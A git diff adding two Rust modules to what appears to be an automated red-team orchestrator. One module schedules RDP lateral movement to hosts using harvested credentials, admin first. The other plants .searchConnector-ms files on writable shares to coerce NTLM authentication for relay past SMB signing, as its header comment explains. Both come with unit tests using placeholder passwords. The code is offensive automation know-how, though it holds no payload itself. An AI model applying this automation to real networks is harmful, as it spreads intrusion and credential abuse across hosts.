+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// RDP lateral movement to hosts with port 3389.
+/// Interval: 45s.
+pub async fn auto_rdp_lateral(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) {
+    let mut interval = tokio::time::interval(Duration::from_secs(45));
+    interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+    loop {
+        tokio::select! {
+            _ = interval.tick() => {},
+            _ = shutdown.changed() => break,
+        }
+        if *shutdown.borrow() {
+            break;
+        }
+
+        if !dispatcher.is_technique_allowed("rdp_lateral") {
+            continue;
+        }
+
+        let work: Vec<RdpWork> = {
+            let state = dispatcher.state.read().await;
+            collect_rdp_work(&state)
+        };
+
+        for item in work {
+            let payload = json!({
+                "technique": "rdp_lateral",
+                "target_ip": item.host_ip,
+                "hostname": item.hostname,
+                "domain": item.domain,
+                "credential": {
+                    "username": item.credential.username,
+                    "password": item.credential.password,
+                    "domain": item.credential.domain,
+                },
+            });
+
+            let priority = dispatcher.effective_priority("rdp_lateral");
+            match dispatcher
+                .throttled_submit("lateral", "lateral", payload, priority)
+                .await
+            {
+                Ok(Some(task_id)) => {
+                    info!(
+                        task_id = %task_id,
+                        host = %item.host_ip,
+                        hostname = %item.hostname,
+                        "RDP lateral movement dispatched"
+                    );
+                    dispatcher
+                        .state
+                        .write()
+                        .await
+                        .mark_processed(DEDUP_RDP_LATERAL, item.dedup_key.clone());
+                    let _ = dispatcher
+                        .state
+                        .persist_dedup(&dispatcher.queue, DEDUP_RDP_LATERAL, &item.dedup_key)
+                        .await;
+                }
+                Ok(None) => {
+                    debug!(host = %item.host_ip, "RDP lateral deferred");
+                }
+                Err(e) => {
+                    warn!(err = %e, host = %item.host_ip, "Failed to dispatch RDP lateral");
+                }
+            }
+        }
+    }
+}
+
+/// Collect RDP lateral movement work items from current state.
+///
+/// Extracted from the async loop for testability.
+fn collect_rdp_work(state: &crate::orchestrator::state::StateInner) -> Vec<RdpWork> {
+    if state.credentials.is_empty() {
+        return Vec::new();
+    }
+
+    let mut items = Vec::new();
+
+    for host in &state.hosts {
+        // Skip already-owned hosts
+        if host.owned {
+            continue;
+        }
+
+        // Check for RDP service (port 3389)
+        let has_rdp = host.services.iter().any(|s| {
+            let sl = s.to_lowercase();
+            sl.contains("3389") || sl.contains("rdp")
+        });
+        if !has_rdp {
+            continue;
+        }
+
+        let dedup_key = format!("rdp:{}", host.ip);
+        if state.is_processed(DEDUP_RDP_LATERAL, &dedup_key) {
+            continue;
+        }
+
+        // Infer domain from hostname
+        let domain = host
+            .hostname
+            .find('.')
+            .map(|i| host.hostname[i + 1..].to_lowercase())
+            .unwrap_or_default();
+
+        // Find admin credential for this domain
+        let cred = state
+            .credentials
+            .iter()
+            .find(|c| {
+                c.is_admin
+                    && !c.password.is_empty()
+                    && (domain.is_empty() || c.domain.to_lowercase() == domain)
+                    && !state.is_credential_quarantined(&c.username, &c.domain)
+            })
+            .or_else(|| {
+                // Fall back to any credential with a password
+                state.credentials.iter().find(|c| {
+                    !c.password.is_empty()
+                        && (domain.is_empty() || c.domain.to_lowercase() == domain)
+                        && !state.is_credential_quarantined(&c.username, &c.domain)
+                })
+            })
+            .cloned();
+
+        let cred = match cred {
+            Some(c) => c,
+            None => continue,
+        };
+
+        items.push(RdpWork {
+            dedup_key,
+            host_ip: host.ip.clone(),
+            hostname: host.hostname.clone(),
+            domain,
+            credential: cred,
+        });
+    }
+
+    items
+}
+
+struct RdpWork {
+    dedup_key: String,
+    host_ip: String,
+    hostname: String,
+    domain: String,
+    credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use crate::orchestrator::state::SharedState;
+    use ares_core::models::{Credential, Host};
+
+    fn make_credential(username: &str, password: &str, domain: &str, is_admin: bool) -> Credential {
+        Credential {
+            id: format!("c-{}", username),
+            username: username.into(),
+            password: password.into(),
// pragma: allowlist secret
+            domain: domain.into(),
+            source: "test".into(),
+            is_admin,
+            discovered_at: None,
+            parent_id: None,
+            attack_step: 0,
+        }
+    }
+
+    fn make_host(ip: &str, hostname: &str, services: Vec<String>, owned: bool) -> Host {
+        Host {
+            ip: ip.into(),
+            hostname: hostname.into(),
+            os: String::new(),
+            roles: Vec::new(),
+            services,
+            is_dc: false,
+            owned,
+        }
+    }
+
+    #[tokio::test]
+    async fn collect_empty_state_returns_no_work() {
+        let shared = SharedState::new("test-op".into());
+        let state = shared.read().await;
+        let work = collect_rdp_work(&state);
+        assert!(work.is_empty());
+    }
+
+    #[tokio::test]
+    async fn collect_no_credentials_returns_no_work() {
+        let shared = SharedState::new("test-op".into());
+        {
+            let mut s = shared.write().await;
+            s.hosts.push(make_host(
+                "192.168.58.10",
+                "srv01.contoso.local",
+                vec!["3389/tcp ms-wbt-server".into()],
+                false,
+            ));
+        }
+        let state = shared.read().await;
+        let work = collect_rdp_work(&state);
+        assert!(work.is_empty());
+    }
+
+    #[tokio::test]
+    async fn collect_host_with_rdp_and_admin_cred() {
+        let shared = SharedState::new("test-op".into());
+        {
+            let mut s = shared.write().await;
+            s.hosts.push(make_host(
+                "192.168.58.10",
+                "srv01.contoso.local",
+                vec!["3389/tcp ms-wbt-server".into()],
+                false,
+            ));
+            s.credentials
+                .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true));
+            // pragma: allowlist secret
+        }
+        let state = shared.read().await;
+        let work = collect_rdp_work(&state);
+        assert_eq!(work.len(), 1);
+        assert_eq!(work[0].host_ip, "192.168.58.10");
+        assert_eq!(work[0].hostname, "srv01.contoso.local");
+        assert_eq!(work[0].domain, "contoso.local");
+        assert_eq!(work[0].credential.username, "admin");
+        assert!(work[0].credential.is_admin);
+    }
+
+    #[tokio::test]
+    async fn collect_host_without_rdp_skipped() {
+        let shared = SharedState::new("test-op".into());
+        {
+            let mut s = shared.write().await;
+            s.hosts.push(make_host(
+                "192.168.58.10",
+                "srv01.contoso.local",
+
vec!["445/tcp microsoft-ds".into()], + false, + )); + s.credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true)); + // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_owned_host_skipped() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + true, // already owned + )); + s.credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true)); + // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_already_processed_skipped() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true)); // pragma: allowlist secret + s.mark_processed(DEDUP_RDP_LATERAL, "rdp:192.168.58.10".into()); + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_falls_back_to_non_admin_cred() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + // Only a non-admin credential available + s.credentials.push(make_credential( + "user1", + "P@ssw0rd!", // pragma: allowlist secret + "contoso.local", + false, + )); + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "user1"); + 
assert!(!work[0].credential.is_admin); + } + + #[tokio::test] + async fn collect_prefers_admin_over_non_admin() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.credentials.push(make_credential( + "user1", + "P@ssw0rd!", // pragma: allowlist secret + "contoso.local", + false, + )); + s.credentials.push(make_credential( + "admin", + "Adm1nP@ss!", // pragma: allowlist secret + "contoso.local", + true, + )); + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + assert!(work[0].credential.is_admin); + } + + #[tokio::test] + async fn collect_no_cred_for_domain_skipped() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + // Credential for wrong domain + s.credentials.push(make_credential( + "admin", + "P@ssw0rd!", // pragma: allowlist secret + "fabrikam.local", + true, + )); + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_bare_hostname_matches_any_domain_cred() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + // Bare hostname (no domain suffix) → domain = "" → matches any cred + s.hosts.push(make_host( + "192.168.58.10", + "srv01", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.credentials.push(make_credential( + "admin", + "P@ssw0rd!", // pragma: allowlist secret + "fabrikam.local", + true, + )); + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, ""); + } + + #[tokio::test] + async fn 
collect_multiple_hosts() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.hosts.push(make_host( + "192.168.58.11", + "srv02.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.hosts.push(make_host( + "192.168.58.12", + "web01.contoso.local", + vec!["80/tcp http".into()], // no RDP + false, + )); + s.credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true)); + // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert_eq!(work.len(), 2); + let ips: Vec<&str> = work.iter().map(|w| w.host_ip.as_str()).collect(); + assert!(ips.contains(&"192.168.58.10")); + assert!(ips.contains(&"192.168.58.11")); + } + + #[tokio::test] + async fn collect_cred_with_empty_password_skipped() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.credentials + .push(make_credential("admin", "", "contoso.local", true)); + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_rdp_detection_by_name() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["remote desktop rdp".into()], + false, + )); + s.credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true)); + // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert_eq!(work.len(), 1); + } + + #[tokio::test] + async fn collect_dedup_key_format() { + let shared = SharedState::new("test-op".into()); + { + let mut s = 
shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true)); + // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert_eq!(work[0].dedup_key, "rdp:192.168.58.10"); + } + + #[tokio::test] + async fn collect_cross_domain_hosts() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.hosts.push(make_host( + "192.168.58.20", + "srv01.fabrikam.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.credentials.push(make_credential( + "admin", + "P@ssw0rd!", // pragma: allowlist secret + "contoso.local", + true, + )); + s.credentials.push(make_credential( + "fadmin", + "F@bPass1!", // pragma: allowlist secret + "fabrikam.local", + true, + )); + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert_eq!(work.len(), 2); + // contoso host uses contoso cred + let contoso_work = work.iter().find(|w| w.host_ip == "192.168.58.10").unwrap(); + assert_eq!(contoso_work.credential.domain, "contoso.local"); + // fabrikam host uses fabrikam cred + let fab_work = work.iter().find(|w| w.host_ip == "192.168.58.20").unwrap(); + assert_eq!(fab_work.credential.domain, "fabrikam.local"); + } + + #[tokio::test] + async fn collect_rdp_work_via_shared_state() { + let shared = crate::orchestrator::state::SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + state.credentials.push(make_credential( + "admin", + "P@ssw0rd!", // pragma: allowlist secret + "contoso.local", + true, + )); + } + let state = 
shared.read().await; + let work = collect_rdp_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].host_ip, "192.168.58.10"); + } + + #[test] + fn dedup_key_format() { + let key = format!("rdp:{}", "192.168.58.22"); + assert_eq!(key, "rdp:192.168.58.22"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_RDP_LATERAL, "rdp_lateral"); + } + + #[test] + fn rdp_service_detection() { + let services = [ + "3389/tcp ms-wbt-server".to_string(), + "80/tcp http".to_string(), + ]; + let has_rdp = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("3389") || sl.contains("rdp") + }); + assert!(has_rdp); + } + + #[test] + fn no_rdp_service() { + let services = [ + "445/tcp microsoft-ds".to_string(), + "80/tcp http".to_string(), + ]; + let has_rdp = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("3389") || sl.contains("rdp") + }); + assert!(!has_rdp); + } + + #[test] + fn domain_from_hostname() { + let hostname = "srv01.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn domain_from_bare_hostname() { + let hostname = "srv01"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, ""); + } + + #[test] + fn rdp_service_detection_by_name() { + let services = ["remote desktop rdp".to_string()]; + let has_rdp = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("3389") || sl.contains("rdp") + }); + assert!(has_rdp); + } + + #[test] + fn rdp_service_detection_case_insensitive() { + let services = ["3389/TCP MS-WBT-SERVER".to_string()]; + let has_rdp = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("3389") || sl.contains("rdp") + }); + assert!(has_rdp); + } + + #[test] + fn rdp_payload_structure() { + let payload = serde_json::json!({ + "technique": "rdp_lateral", + "target_ip": 
"192.168.58.22", + "hostname": "srv01.contoso.local", + "domain": "contoso.local", + "credential": { + "username": "admin", + "password": "P@ssw0rd!", + "domain": "contoso.local", + }, + }); + assert_eq!(payload["technique"], "rdp_lateral"); + assert_eq!(payload["target_ip"], "192.168.58.22"); + assert_eq!(payload["hostname"], "srv01.contoso.local"); + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn rdp_work_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: true, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = RdpWork { + dedup_key: "rdp:192.168.58.22".into(), + host_ip: "192.168.58.22".into(), + hostname: "srv01.contoso.local".into(), + domain: "contoso.local".into(), + credential: cred, + }; + assert_eq!(work.host_ip, "192.168.58.22"); + assert_eq!(work.hostname, "srv01.contoso.local"); + assert!(work.credential.is_admin); + } + + #[test] + fn admin_credential_preferred() { + // The module first looks for admin creds, then falls back to any with password + let is_admin = true; + let has_password = true; + let admin_match = is_admin && has_password; + assert!(admin_match); + } + + #[test] + fn empty_services_no_rdp() { + let services: Vec = vec![]; + let has_rdp = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("3389") || sl.contains("rdp") + }); + assert!(!has_rdp); + } +} diff --git a/ares-cli/src/orchestrator/automation/searchconnector_coercion.rs b/ares-cli/src/orchestrator/automation/searchconnector_coercion.rs new file mode 100644 index 00000000..53c7ce0a --- /dev/null +++ b/ares-cli/src/orchestrator/automation/searchconnector_coercion.rs @@ -0,0 +1,502 @@ +//! auto_searchconnector_coercion -- drop .searchConnector-ms files on writable shares. +//! +//! 
.searchConnector-ms XML files trigger WebDAV connections when a user browses +//! the share in Explorer. Unlike .lnk/.scf/.url (handled by auto_share_coercion), +//! searchConnector files force HTTP-based NTLM auth which bypasses SMB signing +//! requirements, enabling relay to LDAP/ADCS even when SMB signing is enforced. +//! +//! This module targets writable shares that auto_share_coercion has already +//! identified, deploying a complementary coercion technique. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect SearchConnector coercion work items from current state. +/// +/// Pure logic extracted from `auto_searchconnector_coercion` so it can be +/// unit-tested without needing a `Dispatcher` or async runtime. +fn collect_searchconnector_work(state: &StateInner, listener: &str) -> Vec<SearchConnectorWork> { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for share in &state.shares { + if !share.permissions.to_uppercase().contains("WRITE") { + continue; + } + + let dedup_key = format!("searchconn:{}:{}", share.host, share.name); + if state.is_processed(DEDUP_SEARCHCONNECTOR, &dedup_key) { + continue; + } + + // Find credential for the share's host + let host_info = state.hosts.iter().find(|h| h.ip == share.host); + let domain = host_info + .and_then(|h| { + h.hostname + .find('.') + .map(|i| h.hostname[i + 1..].to_lowercase()) + }) + .unwrap_or_default(); + + let cred = state + .credentials + .iter() + .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain) + .or_else(|| state.credentials.first()) + .cloned(); + + let cred = match cred { + Some(c) => c, + None => continue, + }; + + items.push(SearchConnectorWork { + dedup_key, + share_host: share.host.clone(), + share_name: share.name.clone(), + listener: listener.to_string(), + credential:
cred, + }); + } + + items +} + +/// Drops .searchConnector-ms coercion files on writable shares. +/// Interval: 45s. +pub async fn auto_searchconnector_coercion( + dispatcher: Arc<Dispatcher>, + mut shutdown: watch::Receiver<bool>, +) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("searchconnector_coercion") { + continue; + } + + let listener = match dispatcher.config.listener_ip.as_deref() { + Some(ip) => ip.to_string(), + None => continue, + }; + + let work: Vec<SearchConnectorWork> = { + let state = dispatcher.state.read().await; + collect_searchconnector_work(&state, &listener) + }; + + for item in work { + let payload = json!({ + "technique": "searchconnector_coercion", + "target_ip": item.share_host, + "share_name": item.share_name, + "listener_ip": item.listener, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("searchconnector_coercion"); + match dispatcher + .throttled_submit("coercion", "coercion", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + host = %item.share_host, + share = %item.share_name, + "searchConnector-ms coercion file dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_SEARCHCONNECTOR, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_SEARCHCONNECTOR, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(host = %item.share_host, "searchConnector coercion deferred"); + } + Err(e) => { + warn!(err = %e, host = %item.share_host, "Failed to dispatch searchConnector coercion"); + } + } + } + } +} + +struct SearchConnectorWork { + dedup_key:
String, + share_host: String, + share_name: String, + listener: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::StateInner; + use ares_core::models::{Credential, Host, Share}; + + fn make_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_share(host: &str, name: &str, permissions: &str) -> Share { + Share { + host: host.into(), + name: name.into(), + permissions: permissions.into(), + comment: String::new(), + } + } + + fn make_host(ip: &str, hostname: &str) -> Host { + Host { + ip: ip.into(), + hostname: hostname.into(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc: false, + owned: false, + } + } + + #[test] + fn dedup_key_format() { + let key = format!("searchconn:{}:{}", "192.168.58.22", "Public"); + assert_eq!(key, "searchconn:192.168.58.22:Public"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_SEARCHCONNECTOR, "searchconnector"); + } + + #[test] + fn writable_share_detection() { + let write_perms = ["WRITE", "READ/WRITE", "rw WRITE access"]; + for p in &write_perms { + assert!( + p.to_uppercase().contains("WRITE"), + "{p} should be detected as writable" + ); + } + } + + #[test] + fn readonly_share_rejected() { + let perm = "READ"; + assert!(!perm.to_uppercase().contains("WRITE")); + } + + #[test] + fn domain_from_host_hostname() { + let hostname = "srv01.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn payload_structure_validation() { + let cred = ares_core::models::Credential { + id: "c1".into(), + 
username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let payload = serde_json::json!({ + "technique": "searchconnector_coercion", + "target_ip": "192.168.58.22", + "share_name": "Public", + "listener_ip": "192.168.58.50", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + + assert_eq!(payload["technique"], "searchconnector_coercion"); + assert_eq!(payload["target_ip"], "192.168.58.22"); + assert_eq!(payload["share_name"], "Public"); + assert_eq!(payload["listener_ip"], "192.168.58.50"); + assert_eq!(payload["credential"]["username"], "admin"); + assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn writable_share_full_permission() { + let perm = "FULL"; + // FULL does not contain WRITE, so it should NOT be detected + assert!(!perm.to_uppercase().contains("WRITE")); + } + + #[test] + fn domain_from_fqdn_with_subdomain() { + let hostname = "web01.sub.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "sub.contoso.local"); + } + + #[test] + fn domain_from_bare_hostname() { + let hostname = "dc01"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, ""); + } + + #[test] + fn dedup_key_special_characters_in_share_name() { + let key = format!("searchconn:{}:{}", "192.168.58.10", "Share With Spaces"); + assert_eq!(key, "searchconn:192.168.58.10:Share With Spaces"); + + let key2 = format!("searchconn:{}:{}", "192.168.58.10", "data$"); + assert_eq!(key2, "searchconn:192.168.58.10:data$"); + } + + #[test] + fn work_struct_construction() { + let cred = 
ares_core::models::Credential { + id: "c1".into(), + username: "svc_admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let work = SearchConnectorWork { + dedup_key: "searchconn:192.168.58.22:Public".into(), + share_host: "192.168.58.22".into(), + share_name: "Public".into(), + listener: "192.168.58.50".into(), + credential: cred, + }; + + assert_eq!(work.dedup_key, "searchconn:192.168.58.22:Public"); + assert_eq!(work.share_host, "192.168.58.22"); + assert_eq!(work.share_name, "Public"); + assert_eq!(work.listener, "192.168.58.50"); + assert_eq!(work.credential.username, "svc_admin"); + assert_eq!(work.credential.domain, "contoso.local"); + } + + #[test] + fn case_insensitive_permission_matching() { + let perms = ["write", "Write", "WRITE", "read/Write", "Read/WRITE"]; + for p in &perms { + assert!( + p.to_uppercase().contains("WRITE"), + "{p} should be detected as writable regardless of case" + ); + } + } + + // --- collect_searchconnector_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .shares + .push(make_share("192.168.58.22", "Public", "WRITE")); + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_shares_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn 
collect_writable_share_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Public", "WRITE")); + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].share_host, "192.168.58.22"); + assert_eq!(work[0].share_name, "Public"); + assert_eq!(work[0].dedup_key, "searchconn:192.168.58.22:Public"); + assert_eq!(work[0].listener, "192.168.58.50"); + } + + #[test] + fn collect_readonly_share_skipped() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Public", "READ")); + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Public", "WRITE")); + state.mark_processed( + DEDUP_SEARCHCONNECTOR, + "searchconn:192.168.58.22:Public".into(), + ); + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_prefers_domain_matched_credential() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state + .shares + .push(make_share("192.168.58.22", "Data", "READ/WRITE")); 
+ let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[test] + fn collect_falls_back_to_first_credential_no_host() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + // No host entry for this share IP, so domain is empty -> falls back to first cred + state + .shares + .push(make_share("192.168.58.22", "Public", "WRITE")); + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_multiple_shares_produces_work_for_each() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Public", "WRITE")); + state + .shares + .push(make_share("192.168.58.22", "Data", "READ/WRITE")); + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 2); + let names: Vec<&str> = work.iter().map(|w| w.share_name.as_str()).collect(); + assert!(names.contains(&"Public")); + assert!(names.contains(&"Data")); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Public", "WRITE")); + } + let state = shared.read().await; + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].share_host, "192.168.58.22"); + } +} diff --git 
